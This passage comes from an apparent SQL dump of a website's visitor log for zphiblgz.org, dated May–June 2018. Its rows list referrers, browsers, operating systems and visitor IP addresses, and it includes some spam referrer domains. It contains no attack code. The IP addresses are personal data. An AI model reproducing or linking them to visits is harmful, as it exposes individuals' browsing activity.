2018-05-29','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.179.237','000',1,0),(31031,'2018-05-29','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',4,0),(31032,'2018-05-29','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.32','000',1,0),(31033,'2018-05-29','http://zphiblgz.org','MSIE','Windows','9.0','','107.178.194.197','000',1,0),(31034,'2018-05-29','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.87.233.140','000',1,0),(31035,'2018-05-29','http://www.bing.com','MSIE','Windows','8.0','','204.13.201.139','000',1,0),(31036,'2018-05-29','http://www.google.com/','Chrome','Android','66.0.3359.158','','174.204.0.212','000',2,0),(31037,'2018-05-29','http://zphiblgz.org/cache/v12/get_started','Chrome','Windows','66.0.3359.181','','46.101.94.163','000',2,0),(31038,'2018-05-29','http://zphiblgz.org/cache/v12/get_started','Chrome','Android','41.0.2272.118','','92.23.61.78','000',2,0),(31039,'2018-05-29','http://zphiblgz.org/cache/v12/get_started','Safari','iPhone','7.0','','185.220.100.253','000',2,0),(31040,'2018-05-29','http://zphiblgz.org/cache/v12/get_started','Firefox','Windows','60.0','','204.194.29.4','000',2,0),(31041,'2018-05-29','https://zphiblgz.org','Safari','Macintosh','5.1.3','','91.103.66.203','000',2,0),(31042,'2018-05-29','https://zphiblgz.org','Firefox','Windows','40.1','','190.78.14.223','000',2,0),(31043,'2018-05-29','https://zphiblgz.org','MSIE','Windows','8.0','','34.210.73.87','000',1,0),(31044,'2018-05-29','https://zphiblgz.org','MSIE','Windows','8.0','','54.218.108.178','000',1,0),(31045,'2018-05-29','https://zphiblgz.org','Python-urllib','Unknown','2.7','','118.219.252.197','000',1,0),(31046,'2018-05-29','https://zphiblgz.org','MSIE','Windows','6.0','','139.59.149.99','000',1,0),(31047,'2018-05-29','https://zphiblgz.org','Chrome','Windows','56.0.2924.76','','64.74.215.146','000',2,0),(31048,'2018-05-29','https://zphiblgz.org','Chrome','Windows','56.0.2924.87','','31.168.158.239','000',2,0),(31049,'2018-05-29','https://zphiblgz.org','Chrome','Windows','56.0.2924.76','','64.74.215.98','000',2,0),(31050,'2018-05-29','https://zphiblgz.org','Chrome','Windows','56.0.2924.76','','64.74.215.154','000',2,0),(31051,'2018-05-29','https://zphiblgz.org','Firefox','Linux','52.0','','54.71.202.230','000',2,0),(31052,'2018-05-29','https://zphiblgz.org','Firefox','Macintosh','48.0','','18.236.65.249','000',2,0),(31053,'2018-05-29','https://zphiblgz.org','Firefox','Windows','54.0','','52.24.53.92','000',2,0),(31054,'2018-05-29','https://zphiblgz.org','Firefox','Linux','46.0','','34.215.49.37','000',2,0),(31055,'2018-05-29','https://zphiblgz.org','Firefox','Linux','47.0','','52.40.251.176','000',2,0),(31056,'2018-05-29','https://zphiblgz.org','Firefox','Windows','50.0','','34.216.16.232','000',2,0),(31057,'2018-05-29','https://zphiblgz.org','Firefox','Macintosh','46.0','','54.218.47.121','000',2,0),(31058,'2018-05-29','https://zphiblgz.org','Firefox','Windows','40.1','','177.132.169.166','000',2,0),(31059,'2018-05-29','https://zphiblgz.org','Chrome','Windows','66.0.3359.117','','184.154.189.90','000',1,0),(31060,'2018-05-29','http://zphiblgz.org:80/','Chrome','Windows','66.0.3359.117','','184.154.189.92','000',1,0),(31061,'2018-05-29','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.31','000',1,0),(31062,'2018-05-29','http://zphiblgz.org/','Firefox','Windows','43.0','','95.37.4.167','000',3,0),(31063,'2018-05-29','https://www.google.com/','Chrome','Windows','66.0.3359.181','','69.140.89.118','000',7,0),(31064,'2018-05-29','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.32','000',1,0),(31065,'2018-05-29','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.32','000',1,0),(31066,'2018-05-29','https://zphiblgz.org','Chrome','Linux','55.0.2920.38','','23.94.68.254','000',1,0),(31067,'2018-05-29','https://zphiblgz.org','Chrome','Windows','66.0.3359.181','','71.244.134.183','000',7,0),(31068,'2018-05-29','https://zphiblgz.org','Firefox','Windows','7.0.1','','5.254.79.66','000',1,0),(31069,'2018-05-29','https://zphiblgz.org','Firefox','Windows','40.1','','182.186.238.8','000',2,0),(31070,'2018-05-29','https://www.facebook.com/','Chrome','Macintosh','66.0.3359.181','','71.121.134.189','000',3,0),(31071,'2018-05-29','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.31','000',1,0),(31072,'2018-05-29','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.56.232.243','000',2,0),(31073,'2018-05-29','http://www.google.com/search','Chrome','Linux','41.0.2272.118','','64.233.172.170','000',1,0),(31074,'2018-05-29','https://zphiblgz.org','Chrome','Linux','41.0.2272.118','','64.233.172.172','000',1,0),(31075,'2018-05-29','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.31','000',1,0),(31076,'2018-05-29','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.31','000',1,0),(31077,'2018-05-29','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.30','000',1,0),(31078,'2018-05-30','https://zphiblgz.org','Chrome','Windows','66.0.3359.117','','198.143.155.140','000',1,0),(31079,'2018-05-30','http://www.zphiblgz.org:80/','Chrome','Windows','66.0.3359.117','','198.143.155.139','000',1,0),(31080,'2018-05-30','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','165.227.228.4','000',2,0),(31081,'2018-05-30','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',12,0),(31082,'2018-05-30','https://zphiblgz.org/','AppleWebKit','Windows','534','','40.77.189.154','000',1,0),(31083,'2018-05-30','https://zphiblgz.org','MSIE','Windows','9.0','','173.205.33.24','000',1,0),(31084,'2018-05-30','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.29','000',1,0),(31085,'2018-05-30','https://zphiblgz.org','Firefox','Windows','40.1','','160.179.36.40','000',2,0),(31086,'2018-05-30','https://zphiblgz.org','Chrome','Windows','66.0.3359.181','','68.134.3.14','000',3,0),(31087,'2018-05-30','http://zphiblgz.org/service/appa/','Safari','iPhone','7.0','','40.77.188.226','000',1,0),(31088,'2018-05-30','https://zphiblgz.org','MSIE','Windows','8.0','','70.42.131.170','000',2,0),(31089,'2018-05-30','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1804.OdfIOXjL-a6RL9D55XFp7_H-sgacvAiUEIu4Wxnvs8T_DRnnDOBR0WFTyZBZS0JS.4eec414595b3219f3c8ae1da75142a47004e53b9&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YKCJkrjchpDstTwxTkjwGrA&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1k0VnYwcS00NlIxTGlqalNMMU1ENW9WYlZHcE85M3hNWUxkUTl3bzctRlBaN0tqdlNHMVU2MmRTNnExMnUySzc5VUROSjY3UnEtZw&b64e=2&sign=dc27f1b1cff68ac7f9633552583d6c40&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYP93XfrtkbahQYcLgHANyUASdugQRNnLc6uZkNf_0T6n7KHvADIDJXzOSLadu-avcUREPcPxR4wbzpbwsftsd3AZaIZi_a0cSM1cxnPeEgqmZs01byVDZOnNnmrneZIRg&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCVwjJVQHb9Cs3V82nsxVKWMQWbwlq8pW4sNHL3qIjsG8j3EikofXAGyQHIqM1EyQXiXpNab50pjTg&l10n=ru&cts=1527676505343&mc=2.36342629222','MSIE','Windows','10.0','','176.15.20.236','000',1,0),(31090,'2018-05-30','http://zphiblgz.org/','Chrome','Macintosh','58.0.3029.110','','163.172.4.153','000',1,0),(31091,'2018-05-30','https://zphiblgz.org/','Chrome','Windows','58.0.3029.110','','163.172.4.153','000',1,0),(31092,'2018-05-30','https://zphiblgz.org','Chrome','Windows','66.0.3359.181','','214.36.0.135','000',1,0),(31093,'2018-05-30','https://zphiblgz.org','Chrome','Windows','66.0.3359.181','','214.36.6.109','000',4,0),(31094,'2018-05-30','https://zphiblgz.org','Chrome','Linux','26.0.1410.63','','191.96.249.99','000',2,0),(31095,'2018-05-30','https://zphiblgz.org','Chrome','Linux','66.0.3359.181','','50.226.149.83','000',2,0),(31096,'2018-05-30','https://www.google.com/','Firefox','Linux','60.0','','50.226.149.83','000',8,0),(31097,'2018-05-30','https://zphiblgz.org','python-requests','Unknown','2.9.1','','188.166.34.95','000',1,0),(31098,'2018-05-30','https://zphiblgz.org','Firefox','Windows','40.1','','41.35.96.38','000',2,0),(31099,'2018-05-30','http://zphiblgz.org/scholarship/','Safari','iPhone','7.0','','199.30.25.104','000',1,0),(31100,'2018-05-30','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',3,0),(31101,'2018-05-30','https://zphiblgz.org','Opera Next','Windows','36.0.2130.32','','31.184.192.185','000',1,0),(31102,'2018-05-30','https://zphiblgz.org','Firefox','Windows','7.0.1','','192.42.116.16','000',1,0),(31103,'2018-05-30','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.30','000',1,0),(31104,'2018-05-30','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','93.179.68.149','000',2,0),(31105,'2018-05-30','https://zphiblgz.org','Chrome','Linux','10.0.612.3','','93.179.68.149','000',1,0),(31106,'2018-05-30','https://zphiblgz.org','Chrome','Windows','14.0.794.0','','93.179.68.149','000',1,0),(31107,'2018-05-30','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.215.254.26','000',2,0),(31108,'2018-05-30','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.31','000',1,0),(31109,'2018-05-30','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.31','000',1,0),(31110,'2018-05-30','https://zphiblgz.org','Safari','iPhone','11.0','','108.15.43.53','000',4,0),(31111,'2018-05-30','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.31','000',1,0),(31112,'2018-05-30','https://zphiblgz.org','MSIE','Windows','11.0','','69.164.111.198','000',3,0),(31113,'2018-05-30','https://www.google.com/','Chrome','iPhone','66.0.3359.122','','96.241.142.64','000',8,0),(31114,'2018-05-30','https://zphiblgz.org','Safari','iPhone','11.0','','73.180.215.214','000',1,0),(31115,'2018-05-30','https://zphiblgz.org','Firefox','Windows','3.0','','212.124.114.242','000',1,0),(31116,'2018-05-31','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',14,0),(31117,'2018-05-31','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.30','000',1,0),(31118,'2018-05-31','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','178.79.163.215','000',2,0),(31119,'2018-05-31','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.35','000',1,0),(31120,'2018-05-31','https://zphiblgz.org','libwww-perl','Unknown','6.15','','93.182.170.3','000',1,0),(31121,'2018-05-31','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.31','000',1,0),(31122,'2018-05-31','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.31','000',1,0),(31123,'2018-05-31','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1805.CPh8DQHAmnkJW-zGyhzgpOP3oypCntRSHwPhJXdu2mEHSF7AD8vXX0-9MiRZkfBO.9d5f04ca0ec0859442df732ab63bd3ee4e0b67a6&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YFUVNhHyyhJgRFg5yeLMIWU&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV3dLSVBxMzU2VURuMGpISDdLTnJocGFLSEJHNEwxbllVckJ5SjhIbl96dnZyZWpqdXotMDFS&b64e=2&sign=ea70f066f45cc69c48166d6ae086d361&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYpgPUyh7uQlI4bhW4ympWjXY9ceWGkcbQ-1_TF8To1_TnWRVB3pfiyHcn16B3-56rAbQl0DYO1WFPwnT-1JW-g4zID6TjDTJOCjRLnhCBZCGsXdFtZIS3-MZn8_CSWqRxelKyYOZRpV&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCUjf_ou3Qrjt2JoimeOsZ4t2ybEVw5kkuthsCAU3EAKW0kcCplGKzPpULXmanXf4WcpdDvlePOX8w&l10n=ru&cts=1527758594315&mc=3.54056158534','Chrome','Windows','63.0.3239.132','','128.74.244.173','000',2,0),(31124,'2018-05-31','https://zphiblgz.org','libwww-perl','Unknown','6.05','','35.229.164.189','000',1,0),(31125,'2018-05-31','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.31','000',1,0),(31126,'2018-05-31','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.31','000',1,0),(31127,'2018-05-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','47.96.231.74','000',2,0),(31128,'2018-05-31','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.31','000',1,0),(31129,'2018-05-31','https://zphiblgz.org','Firefox','Windows','57.0','','192.3.105.198','000',15,0),(31130,'2018-05-31','https://zphiblgz.org','Firefox','Windows','40.1','','182.65.217.246','000',2,0),(31131,'2018-05-31','https://zphiblgz.org','Firefox','Windows','40.1','','105.107.24.111','000',2,0),(31132,'2018-05-31','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.188.67','000',1,0),(31133,'2018-05-31','https://zphiblgz.org','Chrome','Windows','66.0.3359.117','','184.154.47.2','000',1,0),(31134,'2018-05-31','https://www.bing.com/','MSIE','Windows','11.0','','170.216.4.1','000',2,0),(31135,'2018-05-31','https://www.google.com/','Chrome','Android','66.0.3359.126','','174.205.16.240','000',2,0),(31136,'2018-05-31','https://zphiblgz.org','Firefox','Windows','7.0.1','','54.37.16.241','000',1,0),(31137,'2018-05-31','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',3,0),(31138,'2018-05-31','https://zphiblgz.org','Firefox','Windows','7.0.1','','65.19.167.130','000',2,0),(31139,'2018-05-31','https://zphiblgz.org','Chrome','Windows','65.0.3325.181','','206.180.165.147','000',2,0),(31140,'2018-05-31','https://zphiblgz.org','Firefox','Windows','7.0.1','','199.195.250.77','000',1,0),(31141,'2018-05-31','https://www.facebook.com/','Chrome','Macintosh','64.0.3282.186','','68.134.12.220','000',5,0),(31142,'2018-05-31','https://zphiblgz.org','MSIE','Windows','8.0','','34.214.123.196','000',1,0),(31143,'2018-05-31','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.188.117','000',1,0),(31144,'2018-05-31','https://zphiblgz.org','Chrome','Windows','66.0.3359.117','','198.143.155.140','000',2,0),(31145,'2018-05-31','https://www.google.com/','Chrome','Windows','66.0.3359.181','','97.93.250.33','000',1,0),(31146,'2018-05-31','https://zphiblgz.org','Firefox','Windows','40.1','','103.242.98.169','000',2,0),(31147,'2018-05-31','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.29','000',1,0),(31148,'2018-05-31','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.29','000',1,0),(31149,'2018-05-31','https://zphiblgz.org','Python-urllib','Unknown','2.7','','104.168.136.8','000',1,0),(31150,'2018-05-31','https://zphiblgz.org','Safari','Macintosh','11.1','','71.120.16.174','000',1,0),(31151,'2018-06-01','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',6,0),(31152,'2018-06-01','https://zphiblgz.org','Chrome','Android','38.0.1025.166','','66.249.88.72','000',1,0),(31153,'2018-06-01','https://zphiblgz.org','Chrome','Android','38.0.1025.166','','66.249.88.76','000',1,0),(31154,'2018-06-01','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','46.101.86.185','000',2,0),(31155,'2018-06-01','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.35','000',1,0),(31156,'2018-06-01','https://zphiblgz.org','Chrome','Windows','65.0.3325.181','','52.173.241.248','000',1,0),(31157,'2018-06-01','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.31','000',1,0),(31158,'2018-06-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','185.58.141.157','000',2,0),(31159,'2018-06-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','80.86.22.27','000',2,0),(31160,'2018-06-01','https://zphiblgz.org','Firefox','Windows','24.0','','91.247.38.43','000',1,0),(31161,'2018-06-01','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.188.224','000',1,0),(31162,'2018-06-01','https://zphiblgz.org','Chrome','Linux','46.0.2490.80','','192.162.103.150','000',1,0),(31163,'2018-06-01','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.32','000',1,0),(31164,'2018-06-01','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.32','000',1,0),(31165,'2018-06-01','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','63.142.251.156','000',3,0),(31166,'2018-06-01','http://zphiblgz.org/','Chrome','Windows','62.0.3202.94','','188.165.140.116','000',3,0),(31167,'2018-06-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.231.195.230','000',4,0),(31168,'2018-06-01','https://zphiblgz.org','Firefox','Windows','40.1','','109.245.166.221','000',2,0),(31169,'2018-06-01','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.29','000',1,0),(31170,'2018-06-01','zphiblgz.org','Opera','Windows','8.50','','104.168.145.69','000',2,0),(31171,'2018-06-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','46.185.42.130','000',1,0),(31172,'2018-06-01','http://zphiblgz.org/tag/money/','Firefox','Windows','57.0','','188.165.229.75','000',2,0),(31173,'2018-06-01','https://zphiblgz.org','Chrome','Windows','40.0.2214.115','','45.32.131.61','000',2,0),(31174,'2018-06-01','https://zphiblgz.org','Opera','Windows','11.10','','31.184.192.185','000',4,0),(31175,'2018-06-01','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.30','000',1,0),(31176,'2018-06-01','https://zphiblgz.org','Firefox','Macintosh','5.0.1','','208.80.194.30','000',1,0),(31177,'2018-06-01','http://zphiblgz.org/','Firefox','Macintosh','57.0','','198.23.250.32','000',3,0),(31178,'2018-06-01','http://zphiblgz.org/','Opera','Windows','12.17','','198.23.250.32','000',3,0),(31179,'2018-06-01','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.30','000',1,0),(31180,'2018-06-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','202.66.173.48','000',1,0),(31181,'2018-06-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','212.227.109.59','000',1,0),(31182,'2018-06-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','217.72.198.236','000',1,0),(31183,'2018-06-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','192.185.128.168','000',1,0),(31184,'2018-06-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','50.87.144.81','000',1,0),(31185,'2018-06-01','http://m.facebook.com','AppleWebKit','iPhone','605.1.15','','72.83.19.138','000',2,0),(31186,'2018-06-01','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',5,0),(31187,'2018-06-01','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.32','000',1,0),(31188,'2018-06-01','https://zphiblgz.org','Firefox','Windows','40.1','','39.54.26.209','000',2,0),(31189,'2018-06-01','https://zphiblgz.org','Firefox','Windows','40.1','','92.53.53.193','000',2,0),(31190,'2018-06-01','http://zphiblgz.org/','Chrome','Windows','32.0.1700.107','','193.169.252.17','000',3,0),(31191,'2018-06-01','https://zphiblgz.org','MSIE','Windows','11.0','','161.69.99.11','000',3,0),(31192,'2018-06-01','http://36roommates.wordpress.com','Chrome','Windows','43.0.2376.69','','5.62.57.50','000',4,0),(31193,'2018-06-01','https://yhirurga.ru/','MSIE','Windows','6.0','','46.185.74.179','000',3,0),(31194,'2018-06-01','https://www.google.com/','Safari','Macintosh','11.1','','47.200.13.101','000',2,0),(31195,'2018-06-01','http://www.zphibmaryland.org/chapters/','MSIE','Windows','11.0','','170.218.219.22','000',4,0),(31196,'2018-06-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.26','000',2,0),(31197,'2018-06-01','https://vzheludke.com/','MSIE','Windows','6.0','','178.137.163.137','000',1,0),(31198,'2018-06-01','http://magnetic-bracelets.ru/','MSIE','Windows','7.0a1','','134.249.54.27','000',1,0),(31199,'2018-06-01','https://officedocuments.net/','MSIE','Windows','6.0','','134.249.54.27','000',2,0),(31200,'2018-06-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.27','000',2,0),(31201,'2018-06-01','http://www.regionshop.biz/','MSIE','Unknown','7.0b','','134.249.52.34','000',1,0),(31202,'2018-06-01','https://zphiblgz.org','Chrome','Windows','57.0.2987.133','','46.229.170.197','000',1,0),(31203,'2018-06-02','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1806.rLsrieOuqEx6v39guUvGGyPOOgsayhg8RxcAl5Dw2rL_KkMOSoJgX-ZXR_49a4lr.692dbf4758bbfcc9565e5dd7559468773e1255b9&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YFUVNhHyyhJgRFg5yeLMIWU&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV3dLSVBxMzU2VUR1dTl0d0VqQkNyZUlfczVQUlFWb1JMQnpqdFh6WENpdUNmNzBhS0MtdHVi&b64e=2&sign=4f981a7c4b551e709c7eaabf66f926a8&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQa9gkHE_3kbiZUO3HaurZsQrLU0N8BZtb2NtuEs6QEkNFDK1XxcyZie-ZT5g3vmdLBJvPF2RQ9mwskoL2rQip2g3qP400g79gXZi143P0Ne8pQ_8xWs_SynW0zKVudNLNYj7TuwoCtj5&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCV-HtQ36UFK0yAzcz5SATuOHTnYC_ZhNGeJdnFv8FcoTYgdFyRsugXo5RNLA9mJs6PMToR-ahX3XQ&l10n=ru&cts=1527915040828&mc=2.95554539657','MSIE','Windows','8.0','','176.193.104.159','000',1,0),(31204,'2018-06-02','https://zphiblgz.org/','MSIE','Windows','8.0','','46.42.163.13','000',1,0),(31205,'2018-06-02','https://ofermerah.com/','MSIE','Windows','6.0','','46.185.74.179','000',3,0),(31206,'2018-06-02','http://www.zphiblgz.org','Chrome','Windows','43.0.2376.69','','5.62.57.50','000',8,0),(31207,'2018-06-02','https://zphiblgz.org','Firefox','Linux','50.0','','137.226.113.22','000',2,0),(31208,'2018-06-02','https://hyip-zanoza.me/','MSIE','Windows','6.0','','134.249.52.34','000',4,0),(31209,'2018-06-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','150.95.135.136','000',2,0),(31210,'2018-06-02','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','192.99.9.147','000',2,0),(31211,'2018-06-02','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','165.227.226.68','000',2,0),(31212,'2018-06-02','https://zphiblgz.org','Firefox','Windows','40.1','','90.218.43.149','000',2,0),(31213,'2018-06-02','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',6,0),(31214,'2018-06-02','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.30','000',1,0),(31215,'2018-06-02','https://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.79','000',2,0),(31216,'2018-06-02','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.35','000',2,0),(31217,'2018-06-02','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.35','000',3,0),(31218,'2018-06-02','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','146.185.223.89','000',2,0),(31219,'2018-06-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.58.178.58','000',5,0),(31220,'2018-06-02','https://zphiblgz.org','Chrome','Macintosh','56.0.2954.43','','91.147.229.139','000',1,0),(31221,'2018-06-02','https://zphiblgz.org','Chrome','Macintosh','50.0.2701.47','','91.147.229.139','000',2,0),(31222,'2018-06-02','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',3,0),(31223,'2018-06-02','http://t-rec.su/','MSIE','Unknown','6.0','','178.137.163.137','000',2,0),(31224,'2018-06-02','https://zphiblgz.org','Firefox','Windows','34.0','','193.106.30.99','000',2,0),(31225,'2018-06-02','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.215.254.26','000',2,0),(31226,'2018-06-02','https://www.google.co.jp/','Chrome','Windows','66.0.3359.181','','207.148.103.116','000',3,0),(31227,'2018-06-02','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.188.216','000',1,0),(31228,'2018-06-02','https://zphiblgz.org','Opera','Windows','11.10','','31.184.192.185','000',2,0),(31229,'2018-06-02','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.29','000',1,0),(31230,'2018-06-02','https://zphiblgz.org','Firefox','Windows','7.0.1','','141.255.162.34','000',1,0),(31231,'2018-06-02','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.31','000',1,0),(31232,'2018-06-02','http://www.zphiblgz.org','Chrome','Linux','65.0.3325.181','','45.55.163.133','000',12,0),(31233,'2018-06-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','45.55.163.133','000',1,0),(31234,'2018-06-02','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.31','000',1,0),(31235,'2018-06-02','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.32','000',1,0),(31236,'2018-06-02','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.32','000',1,0),(31237,'2018-06-02','https://store-rx.com/blog/fr/','MSIE','Windows','6.0','','178.137.163.137','000',3,0),(31238,'2018-06-03','https://yhirurga.ru/','MSIE','Windows','6.0','','46.185.74.179','000',3,0),(31239,'2018-06-03','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','139.59.165.96','000',2,0),(31240,'2018-06-03','https://zphiblgz.org','Chrome','Linux','65.0.3325.181','','138.197.11.136','000',13,0),(31241,'2018-06-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.11.136','000',1,0),(31242,'2018-06-03','https://zphiblgz.org','Chrome','Linux','34.0.1847.137','','66.240.236.119','000',3,0),(31243,'2018-06-03','https://zphiblgz.org','Chrome','Linux','5.0.342.1','','188.165.234.52','000',2,0),(31244,'2018-06-03','https://zphiblgz.org','AppleWebKit','Macintosh','603.3.8','','34.220.14.251','000',2,0),(31245,'2018-06-03','https://zphiblgz.org','Chrome','Linux','65.0.3325.181','','138.197.111.22','000',3,0),(31246,'2018-06-03','http://shops-ru.ru/','MSIE','Unknown','6.0','','134.249.54.27','000',4,0),(31247,'2018-06-03','https://www.google.com/','Safari','iPhone','11.0','','73.173.142.8','000',2,0),(31248,'2018-06-03','https://scat.porn/','MSIE','Windows','6.0','','134.249.54.27','000',2,0),(31249,'2018-06-03','74.220.219.51','Firefox','Windows','33.0','','159.203.196.79','000',1,0),(31250,'2018-06-03','https://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.59','000',1,0),(31251,'2018-06-03','https://vzubkah.com/','MSIE','Windows','6.0','','178.137.163.137','000',3,0),(31252,'2018-06-03','https://zphiblgz.org','Chrome','Windows','26.0.1410.43','','142.44.154.169','000',6,0),(31253,'2018-06-03','https://zphiblgz.org','Chrome','Windows','26.0.1410.43','','185.220.101.26','000',4,0),(31254,'2018-06-03','https://zphiblgz.org','Chrome','Windows','26.0.1410.43','','163.172.214.8','000',2,0),(31255,'2018-06-03','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',3,0),(31256,'2018-06-03','https://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',1,0),(31257,'2018-06-03','https://zphiblgz.org','python-requests','Unknown','2.9.1','','188.166.34.95','000',1,0),(31258,'2018-06-03','https://zphiblgz.org','Firefox','Windows','7.0.1','','176.10.104.240','000',1,0),(31259,'2018-06-03','https://zphiblgz.org','Firefox','Windows','40.1','','112.134.45.183','000',2,0),(31260,'2018-06-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.27','000',2,0),(31261,'2018-06-03','https://zphiblgz.org','curl','Unknown','7.38.0','','176.112.194.53','000',2,0),(31262,'2018-06-03','https://zphiblgz.org/','AppleWebKit','Windows','534','','65.55.210.217','000',1,0),(31263,'2018-06-03','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.30','000',1,0),(31264,'2018-06-03','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.30','000',1,0),(31265,'2018-06-03','http://zphiblgz.org/','Chrome','Windows','57.0.2987.133','','163.172.4.153','000',1,0),(31266,'2018-06-03','https://zphiblgz.org/','Chrome','Linux','55.0.2883.87','','163.172.4.153','000',1,0),(31267,'2018-06-03','https://zphiblgz.org','Chrome','Linux','52.0.2753.22','','192.3.26.30','000',1,0),(31268,'2018-06-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','80.84.57.96','000',1,0),(3126